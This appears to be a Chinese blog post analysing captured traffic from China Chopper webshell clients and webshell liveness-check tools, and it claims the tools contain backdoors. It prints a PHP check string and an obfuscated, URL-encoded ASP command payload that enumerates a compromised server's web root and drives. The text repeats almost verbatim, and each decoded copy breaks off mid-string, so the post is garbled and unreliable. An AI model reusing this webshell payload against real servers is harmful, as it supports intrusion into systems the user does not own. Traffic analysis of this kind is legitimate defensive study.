在此之前不得不先普及一下webshell存活检测的原理
为了我错了不少功课,对两款菜刀以及市面上3款webshell存活检测工具抓包分析
发现其中一款菜刀存在后门,3款webshell存活检测工具都存在后门
首先尝试抓包webshell存活检测
结果为 @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-6??Р????
后面乱码了? 不明觉厉
从而得到检测存活性是 执行 对应的代码 ,然后在回显内匹配正确字符
然后从菜刀抓包得到数据
asp网站
psot
cmd=%u0045%xec%ute%G%loba%l%%28Replace%28%22Fu%nct%ion%20bd%28by%V%al%20s%29:Fo%r%20i%%3D1%20T%o%20Le%n%28s%29%20S%te%p%202:c%%3DM%id%28s%2Ci%2C2%29:If%20Is%Nu%meric%28M%id%28s%2Ci%2C1%29%29%20T%hen:bd%%3Dbd%4026%40c%hr%28%22%22%4026%40H%22%22%4026%40c%29:E%lse:bd%%3Dbd%4026%40c%hr%28%22%22%4026%40H%22%22%4026%40c%4026%40M%id%28s%2Ci%2B2%2C2%29%29:i%%3Di%2B2:E%nd%20If:Ne%xt:E%nd%20Fu%nct%ion:E%xecu%te%%28bd%%28%22%224F6E204572726F7220526573756D65204E6578743A526573706F6E73652E57726974652022584059223A44696D20533A533D5365727665722E4D61707061746828222F2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E57726974652853293A526573706F6E73652E57726974652022584059223A526573706F6E73652E456E64%22%22%29%%29%22%2C%22%4026%40%22%2Cchr%2838%29%29%29'
url解码后
E%xec%ute%G%loba%l%(Replace("Fu%nct%ion bd(by%V%al s):Fo%r i%=1 T%o Le%n(s) S%te%p 2:c%=M%id(s,i,2):If Is%Nu%meric(M%id(s,i,1)) T%hen:bd%=bd@26@c%hr(""@26@H""@26@c):E%lse:bd%=bd@26@c%hr(""@26@H""@26@c@26@M%id(s,i+2,2)):i%=i+2:E%nd If:Ne%xt:E%nd Fu%nct%ion:E%xecu%te%(bd%(""4F6E204572726F7220526573756D65204E6578743A526573706F6E73652E577269
为了我错了不少功课,对两款菜刀以及市面上3款webshell存活检测工具抓包分析
发现其中一款菜刀存在后门,3款webshell存活检测工具都存在后门
首先尝试抓包webshell存活检测
如图:
结果为 @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-6??Р????
后面乱码了? 不明觉厉
从而得到检测存活性是 执行 对应的代码 ,然后在回显内匹配正确字符
然后从菜刀抓包得到数据
asp网站
psot
cmd=%u0045%xec%ute%G%loba%l%%28Replace%28%22Fu%nct%ion%20bd%28by%V%al%20s%29:Fo%r%20i%%3D1%20T%o%20Le%n%28s%29%20S%te%p%202:c%%3DM%id%28s%2Ci%2C2%29:If%20Is%Nu%meric%28M%id%28s%2Ci%2C1%29%29%20T%hen:bd%%3Dbd%4026%40c%hr%28%22%22%4026%40H%22%22%4026%40c%29:E%lse:bd%%3Dbd%4026%40c%hr%28%22%22%4026%40H%22%22%4026%40c%4026%40M%id%28s%2Ci%2B2%2C2%29%29:i%%3Di%2B2:E%nd%20If:Ne%xt:E%nd%20Fu%nct%ion:E%xecu%te%%28bd%%28%22%224F6E204572726F7220526573756D65204E6578743A526573706F6E73652E57726974652022584059223A44696D20533A533D5365727665722E4D61707061746828222F2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E57726974652853293A526573706F6E73652E57726974652022584059223A526573706F6E73652E456E64%22%22%29%%29%22%2C%22%4026%40%22%2Cchr%2838%29%29%29'
url解码后
E%xec%ute%G%loba%l%(Replace("Fu%nct%ion bd(by%V%al s):Fo%r i%=1 T%o Le%n(s) S%te%p 2:c%=M%id(s,i,2):If Is%Nu%meric(M%id(s,i,1)) T%hen:bd%=bd@26@c%hr(""@26@H""@26@c):E%lse:bd%=bd@26@c%hr(""@26@H""@26@c@26@M%id(s,i+2,2)):i%=i+2:E%nd If:Ne%xt:E%nd Fu%nct%ion:E%xecu%te%(bd%(""4F6E204572726F7220526573756D65204E6578743A526573706F6E73652E577269